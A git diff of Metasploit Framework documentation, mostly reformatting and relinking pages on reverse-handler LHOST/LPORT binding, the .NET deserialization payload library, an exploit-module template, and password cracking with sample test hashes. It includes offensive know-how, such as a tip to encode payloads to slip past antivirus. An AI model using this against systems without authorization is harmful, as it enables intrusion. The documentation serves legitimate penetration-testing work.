 Total 8 (delta 7), reused 0 (delta 0), pack-reused 0
 remote: Resolving deltas: 100% (7/7), completed with 7 local objects.
-remote: 
+remote:
 remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting:
 remote:      https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters
-remote: 
+remote:
 To github.com:gwillcox-r7/metasploit-framework
 * [new branch]            update_mssql_lib_parameters -> update_mssql_lib_parameters
 ```
@@ -46,13 +46,13 @@ Any user of Metasploit will tell you that they know what `LHOST` and `LPORT` mea

 A **handler** obviously needs to listen on a host/IP for the incoming connection. In cases where the `LHOST` value, for example the address that the target is able to reach, is the same as that which the host can listen on, no extra work has to be done. The `LHOST` value is used by the handler.

-However, if some kind of NAT or port forward is enabled, or if the handler is behind a firewall, then setting `LHOST` isn't enough. In order to listen on the appropriate interface, another setting must be used called `ReverseListenerBindHost`. This value tells the **handler** to listen on a different interface/IP, but it doesn't change the fact that the `LHOST` value is given to the target when the **stage** is uploaded.
+However, if some kind of NAT or port forward is enabled, or if the handler is behind a firewall, then setting `LHOST` isn't enough. In order to listen on the appropriate interface, another setting must be used called `ReverseListenerBindAddress`. This value tells the **handler** to listen on a different interface/IP, but it doesn't change the fact that the `LHOST` value is given to the target when the **stage** is uploaded.

-In short, `LHOST` must always remain the IP/host that is routable from the target, and if this value is not the same as what the listener needs to bind to, then change the `ReverseListenerBindHost` value. If you're attacking something across the Internet and you specify an internal IP in `LHOST`, you're doing it wrong.
+In short, `LHOST` must always remain the IP/host that is routable from the target, and if this value is not the same as what the listener needs to bind to, then change the `ReverseListenerBindAddress` value. If you're attacking something across the Internet and you specify an internal IP in `LHOST`, you're doing it wrong.

 ## LPORT

-The principles of `LHOST` and  `ReverseListenerBindHost` can be applied to `LPORT` and `ReverseListenerBindPort` as well. If you have port forwarding in place, and your listener needs to bind to a different port, then you need to make use of the `ReverseListenerBindPort` setting.
+The principles of `LHOST` and  `ReverseListenerBindAddress` can be applied to `LPORT` and `ReverseListenerBindPort` as well. If you have port forwarding in place, and your listener needs to bind to a different port, then you need to make use of the `ReverseListenerBindPort` setting.

 The classic example of this case is where an attacker wants to make use of port `443`, but rightfully doesn't want to run Metasploit as `root` just so they can directly bind to ports lower than `1024`. Instead, the set up a port forward (on their router, or using `iptables`) so that `443` forwards to `8443`, with a goal of accepting connections on that port instead.

@@ -75,4 +75,4 @@ There are a few things to check for when debugging a dead shell.

 ### Not so quick things to check

-* If the target is running AntiVirus there's a chance that the **stage** , for example `metsrv`, is being caught while being uploaded. `reverse_tcp` and `reverse_http` **stagers** download `metsrv` _without_ any encryption, and so the content of the DLL is visible to anything watching on the wire. `reverse_https` can still get caught in cases where AV is doing MITM content inspection. In this case, consider encoding your payloads, or if possible using stageless Meterpreter instead. 
+* If the target is running AntiVirus there's a chance that the **stage** , for example `metsrv`, is being caught while being uploaded. `reverse_tcp` and `reverse_http` **stagers** download `metsrv` _without_ any encryption, and so the content of the DLL is visible to anything watching on the wire. `reverse_https` can still get caught in cases where AV is doing MITM content inspection. In this case, consider encoding your payloads, or if possible using stageless Meterpreter instead. 
@@ -1,7 +1,7 @@
 Metasploit includes a library for leveraging .NET deserialization attacks. Using
 it within a module is very straight forward, the module author just needs to
 know two things: the gadget chain and the formatter. The library uses the same
-names for each of these values as the [YSoSerial.NET][1] project for
+names for each of these values as the [YSoSerial.NET][ysoserial] project for
 compatibility, although the Metasploit library only supports a subset of the
 functionality.

@@ -12,7 +12,7 @@ compatibility of each.

 | Gadget Chain Name           | BinaryFormatter | LosFormatter | SoapFormatter |
 | --------------------------- | --------------- | ------------ | ------------- |
-| ClaimsPrincipal             | Yes             | Yes          | Yes           | 
+| ClaimsPrincipal             | Yes             | Yes          | Yes           |
 | TextFormattingRunProperties | Yes             | Yes          | Yes           |
 | TypeConfuseDelegate         | Yes             | Yes          | No            |
 | WindowsIdentity             | Yes             | Yes          | Yes           |
@@ -69,7 +69,7 @@ serialized = ::Msf::Util::DotNetDeserialization.generate(
 The library also has an interface available as a standalone command line tool
 which is suitable for creating payloads for single-use research purposes. This
 tool `dot_net.rb` is available in the `tools/payloads/ysoserial` directory. The
-arguments for this tool are aligned with those of [YSoSerial.NET][1], allowing
+arguments for this tool are aligned with those of [YSoSerial.NET][ysoserial], allowing
 the arguments of basic invocations to be the same. It should be noted however
 that the [supported](#support-matrix) gadgets and formatters are not the same.

@@ -109,13 +109,13 @@ generate functions while the `-f` / `--formatter` arguments maps to the
 ## Making Changes

 Adding new gadget chains and formatters involves creating a new file in the
-respective library directory: [`lib/msf/util/dot_net_deserialization`][2]. The
-"native" gadget chain type is implemented following the [MS-NRBF][3] format and
-the [Bindata][4] records as defined in [`types/`][5] subdirectory. Once the new
+respective library directory: [`lib/msf/util/dot_net_deserialization`][dot-net-deserialization-root]. The
+"native" gadget chain type is implemented following the [MS-NRBF] format and
+the [Bindata][] records as defined in [`types/`][dot-net-deserialization-types] subdirectory. Once the new
 gadget chain or formatter is implemented, it needs to be added to the main
-library file ([`dot_net_deserialization.rb`][6]).
+library file ([`dot_net_deserialization.rb`][dot-net-deserialization-rb]).

-Since serialization chain generate is deterministic, a [unit test][7] should be
+Since serialization chain generate is deterministic, a [unit test][unit-test] should be
 added for any new gadget chain to ensure that the checksum of the
 BinaryFormatter representation is consistent.

@@ -124,15 +124,13 @@ Since the .NET deserialization gadgets run operating system commands, the
 following resources can be helpful for module developers to deliver native
 payloads such as Meterpreter.

-* [How to use command stagers][8]
-* [How to use Powershell in an exploit][9]
+* [[How to use command stagers|./how-to-use-command-stagers.md]]
+* [[How to use Powershell in an exploit|./how-to-use-powershell-in-an-exploit.md]]

-[1]: https://github.com/pwntester/ysoserial.net
-[2]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization
-[3]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5
-[4]: https://github.com/dmendel/bindata
-[5]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
-[6]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
-[7]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
-[8]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers
-[9]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit
+[ysoserial]: https://github.com/pwntester/ysoserial.net
+[dot-net-deserialization-root]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization
+[MS-NRBF]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5
+[Bindata]: https://github.com/dmendel/bindata
+[dot-net-deserialization-types]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
+[dot-net-deserialization-rb]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
+[unit-test]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)|
 | [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
 | [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
 | [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
@@ -24,7 +24,7 @@ Difficulty: 4/5

 ### LDAP Capture Capabilities

-Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
+Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=msf_docs). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.

 Size: Medium  
 Difficulty: 3/5
@@ -58,7 +58,7 @@ Difficulty: 4/5

 Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed.

-See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [Metasploit-Data-Service-Enhancements-(Goliath)](./Metasploit-Data-Service-Enhancements-Goliath)
+See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [[Metasploit-Data-Service-Enhancements-(Goliath)|./Metasploit-Data-Service-Enhancements-Goliath]

 Size: Medium/Large (Depends on proposal)  
 Difficulty 3/5
@@ -0,0 +1,54 @@
+GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.
+
+Mentors: @jmartin-r7
+
+Slack Contacts: @Op3n4M3 on [Metasploit Slack](https://metasploit.slack.com/)
+
+For any questions about these projects reach out on the Metasploit Slack in the `#gsoc` channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don't expect an immediate response, however we will endeavor to respond as soon as possible. If you'd prefer not to join Slack, you can also email `msfdev [@] metasploit [dot] com` and we will respond to your questions there if email is preferable.
+
+## Enhance Metasploit Framework
+
+### Rest API Pagination
+
+Metasploit provides two API interaction services, a Rest API service and an RPC service. Previous efforts have wrapped and exposed the RPC service as JSON responses available from the Rest API endpoint. This wrapping did not account for possible large responses that may benefit from pagination. A previous contributor attempted to add this functionality for a [limited set of RCP commands](https://github.com/rapid7/metasploit-framework/pull/13439) however review identified that the changes would introduce changes to the documented public API and also introduce inconsistency within the API responses resulting in a fluctuating public API. Modern pagination would be beneficial to increasing user adoption of Rest API services provided it can be implemented consistently and either maintain compatibility of the existing public RPC service or generate a one time migration across all exposed public APIs.
+
+Size: Large  
+Difficulty: 4/5
+
+### LDAP Capture Capabilities
+
+Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=msf_docs). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
+
+Size: Medium  
+Difficulty: 3/5
+
+### Improving post-exploit API to be more consistent, work smoothly across session types
+
+The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements:
+
+ * Shell sessions do not implement the filesystem API that Meterpreter sessions have
+ * When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these.
+ * Simple commands like 'cmd_exec' are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily.
+
+Size: Medium/Large (Depends on proposal)  
+Difficulty: Varies
+
+### Improve the web vulnerability API
+
+This would follow up on the Arachni plugin PR <https://github.com/rapid7/metasploit-framework/pull/8618> and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners.
+
+Size: Large  
+Difficulty: 4/5
+
+### Data Visualization
+
+Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed.
+
+See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [[Metasploit-Data-Service-Enhancements-(Goliath)|./Metasploit-Data-Service-Enhancements-Goliath]]
+
+Size: Medium/Large (Depends on proposal)
+Difficulty 3/5
+
+## Submit your own
+
+If you want to suggest your own idea, please discuss it with us first on [Slack](https://metasploit.com/slack) in the `#gsoc` channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project.
@@ -27,9 +27,9 @@ The Metasploit Framework has seven different rankings to indicate how reliable a

 ## Template

-If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://rapid7.github.io/metasploit-framework/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.
+If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://docs.metasploit.com/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.

-For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [How to send an HTTP Request Using HTTPClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). If you're interested in browser exploit writing, definitely check out: [How to write a browser exploit using BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer), etc.
+For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [[How to send an HTTP Request Using HTTPClient|./How-to-write-a-browser-exploit-using-HttpServer.md]]. If you're interested in browser exploit writing, definitely check out: [[How to write a browser exploit using BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]], etc.

 But of course, to begin, you most likely need a template to work with, and here it is. We'll also explain how to fill out the required fields:

@@ -39,39 +39,39 @@ But of course, to begin, you most likely need a template to work with, and here
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
-      'Description'    => %q{
-        Say something that the user might need to know
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'Name' ],
-      'References'     =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '[Vendor] [Software] [Root Cause] [Vulnerability type]',
+        'Description' => %q{
+          Say something that the user might need to know
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Name' ],
+        'References' => [
          [ 'URL', '' ]
        ],
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          [ 'System or software version',
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'System or software version',
            {
              'Ret' => 0x41414141 # This will be available in `target.ret`
            }
          ]
        ],
-      'Payload'        =>
-        {
+        'Payload' => {
          'BadChars' => "\x00"
        },
-      'Privileged'     => false,
-      'DisclosureDate' => "",
-      'DefaultTarget'  => 0))
+        'Privileged' => false,
+        'DisclosureDate' => '',
+        'DefaultTarget' => 0
+      )
+    )
  end

  def check
@@ -289,7 +289,7 @@ end

 msfconsole output:

-```
+```msf
 msf6 exploit(windows/smb/msf_smb_client_test) > options

 Module options (exploit/windows/smb/msf_smb_client_test):
@@ -406,7 +406,7 @@ end

 msfconsole output:

-```
+```msf
 msf6 exploit(windows/smb/ruby_smb_client_test) > options

 Module options (exploit/windows/smb/ruby_smb_client_test):
@@ -1,6 +1,6 @@
 # Intro

-This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them.  In general, this will not cover storing credentials in the database, which can be read about [here](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners#the-scan-block).  Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and  [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).
+This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them.  In general, this will not cover storing credentials in the database, which can be read about [[here|./Creating-Metasploit-Framework-LoginScanners.md]].  Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and  [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).

 # Hashes

@@ -9,7 +9,7 @@ Many modules dump hashes from various software.  Anything from the OS: [Windows]
 ## Hash Identify Example

 In this first, simple, example we will simply show loading the library and calling its function.
-```
+```ruby
 require 'metasploit/framework/hashes/identify'
 puts identify_hash "$1$28772684$iEwNOgGugqO9.bIz5sk8k/"
 # note, bad hashes return an empty string since nil is not accepted when creating credentials in msf.
@@ -17,7 +17,7 @@ puts identify_hash "This_is a Fake Hash"
 puts identify_hash "_9G..8147mpcfKT8g0U."
 ```
 In practice, we receive the following output from this:
-```
+```ruby
 msf5 > irb
 [*] Starting IRB shell...
 [*] You are in the "framework" object
@@ -43,7 +43,7 @@ This section will cover the differences between the two crackers.  This is not a
 ### General Settings

 | Description     | JtR              | hashcat             |
-|-----------------|------------------|---------------------|
+| --------------- | ---------------- | ------------------- |
 | session         | `--session`      | `--session`         |
 | no logging      | `--no-log`       | `--logfile-disable` |
 | config file     | `--config`       | (n/a)               |
@@ -57,33 +57,33 @@ This section will cover the differences between the two crackers.  This is not a

 ### Hash Setting

-| Hash                        | JtR                     |  [hashcat](https://hashcat.net/wiki/doku.php?id=example_hashes) |
-|-----------------------------|-------------------------|--------------------|
-| List formats                | `john --list=formats` `john --list=format-all-details` | `hashcat -h` |
-| | | |
-| cram-md5                    | hmac-md5                | 10200                   |
-| des                         | descrypt                | 1500                    |
-| md5 (crypt is $1$)          | md5crypt                | 500                     |
-| sha1                        |                         | 100                     |
-| bsdi                        | bsdicrypt               | 12400                   |
-| sha256                      | sha256crypt             | 7400                    |
-| sha512                      | sha512crypt             | 1800                    |
-| blowfish                    | bcrypt                  | 3200                    |
-| lanman                      | lm                      | 3000                    |
-| NTLM                        | nt                      | 1000                    |
-| mssql (05)                  | mssql                   | 131                     |
-| mssql12                     | mssql12                 | 1731                    |
-| mssql (2012/2014)           | mssql05                 | 132                     |
-| oracle (10)                 | oracle                  | 3100                    |
-| oracle 11                   | oracle11                | 112                     |
-| oracle 12                   | oracle12c               | 12300                   |
-| postgres                    | dynamic_1034            | 12                      |
-| mysql                       | mysql                   | 200                     |
-| mysql-sha1                  | mysql-sha1              | 300                     |
-| sha512($p.$s) - vmware ldap | dynamic_82              | 1710                    |
-| md5 (raw, unicode)          | Raw-MD5u                | 30 (with an empty salt) |
-| NetNTLMv1                   | netntlm                 | 5500                    |
-| NetNTLMv2                   | netntlmv2               | 5600                    |
+| Hash                        | JtR                                                    | [hashcat](https://hashcat.net/wiki/doku.php?id=example_hashes) |
+| --------------------------- | ------------------------------------------------------ | -------------------------------------------------------------- |
+| List formats                | `john --list=formats` `john --list=format-all-details` | `hashcat -h`                                                   |
+|                             |                                                        |                                                                |
+| cram-md5                    | hmac-md5                                               | 10200                                                          |
+| des                         | descrypt                                               | 1500                                                           |
+| md5 (crypt is $1$)          | md5crypt                                               | 500                                                            |
+| sha1                        |                                                        | 100                                                            |
+| bsdi                        | bsdicrypt                                              | 12400                                                          |
+| sha256                      | sha256crypt                                            | 7400                                                           |
+| sha512                      | sha512crypt                                            | 1800                                                           |
+| blowfish                    | bcrypt                                                 | 3200                                                           |
+| lanman                      | lm                                                     | 3000                                                           |
+| NTLM                        | nt                                                     | 1000                                                           |
+| mssql (05)                  | mssql                                                  | 131                                                            |
+| mssql12                     | mssql12                                                | 1731                                                           |
+| mssql (2012/2014)           | mssql05                                                | 132                                                            |
+| oracle (10)                 | oracle                                                 | 3100                                                           |
+| oracle 11                   | oracle11                                               | 112                                                            |
+| oracle 12                   | oracle12c                                              | 12300                                                          |
+| postgres                    | dynamic_1034                                           | 12                                                             |
+| mysql                       | mysql                                                  | 200                                                            |
+| mysql-sha1                  | mysql-sha1                                             | 300                                                            |
+| sha512($p.$s) - vmware ldap | dynamic_82                                             | 1710                                                           |
+| md5 (raw, unicode)          | Raw-MD5u                                               | 30 (with an empty salt)                                        |
+| NetNTLMv1                   | netntlm                                                | 5500                                                           |
+| NetNTLMv2                   | netntlmv2                                              | 5600                                                           |

 While Metasploit standardizes with the JtR format, the hashcat [library](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/password_crackers/cracker.rb) includes the `jtr_format_to_hashcat_format` function to translate from jtr to hashcat.

@@ -123,14 +123,19 @@ JtR
 For testing Hashcat/JtR integration, this is a common list of commands to import example hashes of many different types.  When possible the username is separated by an underscore, and anything after it is the password.  For example `des_password`, the password for the hash is `password`:

 ```
+# nix
 creds add user:des_password hash:rEK1ecacw.7.c jtr:des
 creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
 creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
 creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
 creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
 creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
+# windows
 creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
 creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
+creds add user:u4-netntlm hash:u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c jtr:netntlm
+creds add user:admin hash:admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 jtr:netntlmv2
+# sql
 creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
 creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
 creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12
@@ -153,29 +158,32 @@ creds add user:vmware_ldap hash:'$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08

 This data breaks down to the following table:

-| Hash Type | Username | Hash | Password | jtr format | Modules which dump this info | Modules which crack this |
-|-----------|----------|------|----------|------------|------------------------------|-------------------------|
-| DES | des_password   |  `rEK1ecacw.7.c`                     | password | des  | | auxiliary/analyze/jtr_aix auxiliary/analyze/jtr_linux |
-| MD5 | md5_password   | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/` | password | md5  | | auxiliary/analyze/jtr_linux |
-| BSDi | bsdi_password | `_J9..K0AyUubDrfOgO4s`               | password | bsdi | | auxiliary/analyze/jtr_linux |
-| SHA256 | sha256_password | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5` | password | sha256,crypt | | auxiliary/analyze/jtr_linux |
-| SHA512 | sha512_password | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1` | password | sha512,crypt | | auxiliary/analyze/jtr_linux |
-| Blowfish | blowfish_password | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe` | password | bf | | auxiliary/analyze/jtr_linux |
-| Lanman | lm_password | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C` | password | lm | | auxiliary/analyze/jtr_windows_fast |
-| NTLM | nt_password | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C` | password | nt | | auxiliary/analyze/jtr_windows_fast |
-| MSSQL (2005) | mssql05_toto | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908` | toto | mssql05 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/jtr_mssql_fast |
